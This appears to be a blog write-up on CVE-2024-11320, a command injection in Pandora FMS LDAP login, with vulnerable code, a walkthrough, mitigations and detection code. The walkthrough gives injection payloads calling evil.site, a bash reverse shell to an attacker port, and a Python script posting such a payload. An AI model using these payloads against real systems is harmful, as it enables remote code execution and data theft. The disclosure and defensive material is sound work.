CVE-2024-11320 - Command Injection in Pandora FMS LDAP Authentication (700–777.4)
In November 2024, a severe vulnerability (CVE-2024-11320) was disclosed in Pandora FMS, a popular IT monitoring platform. It lets an attacker execute arbitrary commands on the server by exploiting a command injection flaw in Pandora's LDAP authentication mechanism, and it affects all versions from 700 up to and including 777.4. Here is a step-by-step breakdown of the vulnerability and of how an attacker might exploit it, with illustrative code examples.
What is Pandora FMS?
Pandora FMS (Flexible Monitoring System) is an open-source monitoring suite for servers, networks, and applications. Companies use its LDAP integration to manage user authentication against centralized directories like Microsoft Active Directory.
Vulnerability Summary
Pandora FMS's LDAP authentication path fails to sanitize user-supplied input before using it. This lets an attacker inject operating-system commands through a specially crafted username or password submitted to the LDAP login form.
When the console authenticates a user against an LDAP server by shelling out to a command-line client, it builds the command line by interpolating the submitted credentials. If the input contains a quote followed by shell metacharacters (such as ;, &&, or |), the shell treats the remainder as a new command, which executes with the privileges of the Pandora console process (typically the web server user, such as www-data or apache).
Affected Versions:
- Pandora FMS 700 through 777.4 (inclusive); releases after 777.4 contain the fix.
Technical Analysis
Let’s break down what actually happens inside the vulnerable code.
Example Vulnerable Code Snippet
> Note: This is an illustrative code based on community disclosures and review of Pandora FMS’s codebase.
```php
// /include/functions_auth.php (paraphrased example)
$user = $_POST['ldap_user'];
$pass = $_POST['ldap_pass'];
$ldap_server = $config['ldap_server'];
// Bad: $user and $pass are interpolated into a shell command line unfiltered;
// a single quote in either value ends the quoted argument.
$cmd = "ldapsearch -x -H ldap://$ldap_server -D '$user' -w '$pass' -b 'dc=example,dc=com'";
$output = shell_exec($cmd);
// The output then gets parsed for authentication results.
```
Problem:
If an attacker submits a username like
eviluser'; id; #
the ldapsearch command becomes
ldapsearch -x -H ldap://ldap-server -D 'eviluser'; id; #' -w 'password' -b ...
The first ' closes the -D argument, ; terminates the ldapsearch invocation, id runs as a second command, and # turns the remainder of the line (including the password) into a comment. Any command the attacker chooses runs with the privileges of the web server process, leaking information or serving as a foothold for deeper attacks.
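To make the shell's view of that command line concrete, here is an added Python example (not Pandora FMS code, and not from the original article) that rebuilds the command exactly as the illustrative PHP snippet does, tokenizes it the way a POSIX shell would, and contrasts it with the two standard fixes: an argv list with no shell at all, and per-argument quoting (escapeshellarg() in PHP, shlex.quote() here). The server name ldap-server, the base DN dc=example,dc=com and all function names are assumptions taken from the snippet; nothing here contacts an LDAP server or runs ldapsearch.

```python
"""Added example (not Pandora FMS code): how a POSIX shell sees the command string
built by the illustrative PHP snippet, and two safer ways to build the same call.
Assumed values: server 'ldap-server' and base DN 'dc=example,dc=com' from the snippet."""
import shlex

LDAP_SERVER = "ldap-server"       # placeholder from the article's example command
BASE_DN = "dc=example,dc=com"     # placeholder from the article's example command


def build_vulnerable_cmd(user, password):
    """Mirror of the PHP snippet: raw interpolation into single-quoted shell arguments."""
    return (f"ldapsearch -x -H ldap://{LDAP_SERVER} "
            f"-D '{user}' -w '{password}' -b '{BASE_DN}'")


def shell_words(cmd):
    """Tokenize a command line the way a POSIX shell does before execution:
    quotes are resolved, ';' '|' '&' '<' '>' become separate operator tokens,
    and '#' at the start of a word begins a comment that swallows the rest."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True   # keep 'ldap://host' and 'dc=a,dc=b' as one word
    return list(lexer)


def injected_commands(cmd):
    """Return the words that would run as *additional* commands: every token that
    directly follows a command separator. Empty for a correctly quoted command."""
    words = shell_words(cmd)
    separators = {";", "|", "||", "&", "&&"}
    return [words[i + 1] for i, w in enumerate(words)
            if w in separators and i + 1 < len(words)]


def build_safe_argv(user, password):
    """Preferred fix: an argv list handed to an exec-style API with no shell
    (subprocess.run(argv) in Python, proc_open() with an array in PHP >= 7.4).
    Metacharacters in `user` stay literal bytes of a single argument."""
    return ["ldapsearch", "-x", "-H", f"ldap://{LDAP_SERVER}",
            "-D", user, "-w", password, "-b", BASE_DN]


def build_safe_cmd(user, password):
    """If a shell string is unavoidable, quote every argument (escapeshellarg()
    in PHP, shlex.quote() here) so the shell never sees an operator inside it."""
    return " ".join(shlex.quote(a) for a in build_safe_argv(user, password))


if __name__ == "__main__":
    payload = "eviluser'; id; #"            # the article's example username
    vulnerable = build_vulnerable_cmd(payload, "password")
    print("shell sees:", shell_words(vulnerable))
    print("extra commands:", injected_commands(vulnerable))
    safe = build_safe_cmd(payload, "password")
    print("quoted form:", safe)
    print("shell sees:", shell_words(safe))
    print("extra commands:", injected_commands(safe))
```

Run it and the vulnerable line tokenizes to ldapsearch ... -D eviluser ; id ; with everything after # (including -w and the password) discarded as a comment, which is exactly why the injected id runs; the quoted form keeps the whole payload as the single -D argument and yields no extra command.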
Exploitation Walkthrough
1. Discover the LDAP Login Page
First, the attacker finds the Pandora FMS LDAP-enabled login page (this article's example uses /pandora_console/index.php?login=ldap).
2. Inject a Command Through the Login Form
In the "Username" or "Password" field, the attacker submits input like
Username: admin';curl https://evil.site/pwned;#
Password: anything
On submission, the vulnerable code runs the following shell command
ldapsearch -x -H ldap://ldap-server -D 'admin';curl https://evil.site/pwned;#' -w 'anything' -b ...
The ' closes the -D argument, ; ends the ldapsearch command, curl runs with the web server's privileges (reaching out to evil.site to leak data, or to fetch and run further code), and # comments out the rest of the original line so the shell never trips over the dangling quote.
A more dangerous input spawns a reverse shell, giving the attacker interactive control of the server:
Username: admin';bash -i >& /dev/tcp/attacker_ip/4444 0>&1;#
Here >& sends the shell's stdout and stderr to the TCP socket and 0>&1 reads its stdin from the same socket, so the server initiates a shell connection back to the attacker's listener.
3. Automate It
Here is a minimal Python script that sends the same payload; the form-field names follow the illustrative snippet above and must be adjusted to the form the console actually serves.
```python
import requests

# Field names (ldap_user / ldap_pass) follow the illustrative PHP snippet above.
url = 'https://your-victim.site/pandora_console/index.php?login=ldap'
data = {
    'ldap_user': "attacker';curl http://attacker.site/captured;#",
    'ldap_pass': 'irrelevant',
}

response = requests.post(url, data=data, timeout=10)
print('Exploit sent (HTTP %d). Check your listener/HTTP log for incoming requests.'
      % response.status_code)
```
Impact
- Remote Code Execution: Arbitrary commands run as the web server user on the monitoring host.
- Data Theft: Credentials, monitoring secrets, and more.
- Pivot Point: Attackers can use Pandora FMS's broad reach into monitored systems to hop into the rest of your internal infrastructure.
Mitigation
- Patch Immediately: Upgrade Pandora FMS to a release newer than 777.4 (see the vendor advisory).
- Restrict Exposure: Put the console behind a VPN or an allow-list and lock down who can reach the login page; an LDAP-enabled login form reachable from the internet turns this bug into unauthenticated remote code execution.
- Hunt for Abuse: Review web server and console logs for login attempts whose username or password contains quotes or shell metacharacters (;, |, &, $, backticks) and for bursts of LDAP authentication failures.
- For Developers: Never build a shell command line from user input. Talk to the directory through PHP's ldap_* extension, or, if an external tool is unavoidable, pass an argv array to proc_open() or wrap every argument with escapeshellarg().
References & More Reading
- NIST NVD – CVE-2024-11320
- Pandora FMS Security Advisories
- Exploit-DB Entry
CVE-2024-11320 is a critical, easily exploitable flaw in Pandora FMS up to 777.4.
If you run a vulnerable Pandora FMS installation, patch it today and check your logs for suspicious events. This is a reminder that user-supplied data, especially on authentication paths, should _never_ be passed to shells without stringent validation and sanitization.
For blue teams: script alerts for sudden LDAP authentication failures, and lock down who can access Pandora FMS.
For researchers: always check for command injections in any interface calling the shell.
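For the blue-team advice above, here is an added Python example (not part of Pandora FMS or of the original article) that implements both checks over a handful of constructed authentication events: it flags usernames containing shell metacharacters and reports sources that accumulate five LDAP failures within a minute. The log-line format, field names and sample addresses are invented for this example; Pandora FMS's real audit log looks different, so parse_line() is the part to adapt.

```python
"""Added detection example (not Pandora FMS code). The log format below is
CONSTRUCTED for this example and is not Pandora FMS's real audit format."""
import re
from collections import defaultdict
from datetime import datetime

# Characters that let a username break out of a shell-quoted argument or start a
# new command. '=' and ',' are deliberately absent: they are legal in LDAP DNs.
SHELL_METACHARS = set(";|&$`'\"<>(){}\n")

# Hypothetical line layout: <iso-ts> src=<ip> user="<name>" result=<OK|FAIL> method=<ldap|local>
LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) user="(?P<user>.*)" '
    r'result=(?P<result>\w+) method=(?P<method>\w+)$'
)


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def is_suspicious_username(user):
    """True when the submitted username contains characters a shell would interpret."""
    return any(c in SHELL_METACHARS for c in user)


def failure_bursts(records, threshold=5, window_seconds=60):
    """Return {src: max failures seen in any window} for sources whose LDAP
    failures reach `threshold` within `window_seconds` (sliding window per source)."""
    by_src = defaultdict(list)
    for r in records:
        if r["method"] == "ldap" and r["result"] == "FAIL":
            by_src[r["src"]].append(r["ts"])
    bursts = {}
    for src, times in by_src.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[src] = best
    return bursts


def detect(lines, threshold=5, window_seconds=60):
    """Run both checks over raw log lines; returns a list of (kind, src, detail)."""
    records = [r for r in map(parse_line, lines) if r]
    alerts = [("shell_metachar_in_username", r["src"], r["user"])
              for r in records if is_suspicious_username(r["user"])]
    for src, n in failure_bursts(records, threshold, window_seconds).items():
        alerts.append(("ldap_failure_burst", src, f"{n} failures within {window_seconds}s"))
    return alerts


# Constructed sample events: a normal login, an injection attempt, a legitimate DN,
# and five failures from one source inside 40 seconds.
SAMPLE_LOG = [
    '2024-11-22T10:15:01Z src=198.51.100.5 user="jdoe" result=OK method=ldap',
    '2024-11-22T10:15:07Z src=203.0.113.7 user="admin\';curl https://evil.site/pwned;#" result=FAIL method=ldap',
    '2024-11-22T10:16:00Z src=198.51.100.9 user="uid=svc,dc=example,dc=com" result=OK method=ldap',
] + [
    f'2024-11-22T10:20:{s:02d}Z src=203.0.113.9 user="probe{s}" result=FAIL method=ldap'
    for s in range(0, 50, 10)
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The metacharacter check catches the single attempt that matters even when the attacker never produces a failure burst, while the burst check catches password spraying and fuzzing of the same endpoint; the DN-style username passes both, which is the reason = and , are excluded from the character set.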
Stay safe out there!
*This information is provided for educational and defensive purposes. Do not misuse.*
Timeline
Published on: 11/21/2024 11:15:24 UTC
Last modified on: 11/26/2024 17:26:33 UTC